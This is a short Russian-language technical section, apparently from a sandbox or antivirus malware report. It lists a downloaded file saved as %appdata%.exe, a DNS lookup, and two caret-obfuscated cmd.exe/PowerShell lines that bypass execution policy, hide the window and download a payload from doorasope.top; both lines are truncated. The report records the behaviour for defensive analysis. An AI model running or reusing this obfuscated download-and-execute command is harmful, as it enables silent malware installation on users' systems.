Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^ERSH^E^lL.^exE -E^xECu^t^I^ON^Pol^IcY B^y^p^As^s -noprO^F^I^LE -^WinDoW^sTY^Le HiDdEn^ (N^Ew^-ob^jE^cT SY^StE^m^.n^eT^.w^EBclI^E^n^t).do^WN^L^OAdf^i^L^e^(^'http://www.doo...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pow^ERSH^E^lL.^exE -E^xECu^t^I^ON^Pol^IcY B^y^p^As^s -noprO^F^I^LE -^WinDoW^sTY^Le HiDdEn^ (N^Ew^-ob^jE^cT SY^StE^m^.n^eT^.w^EBclI^E^n^t).do^WN^L^OAdf^i^L^e^(^'http://www.doo...' (со скрытым окном)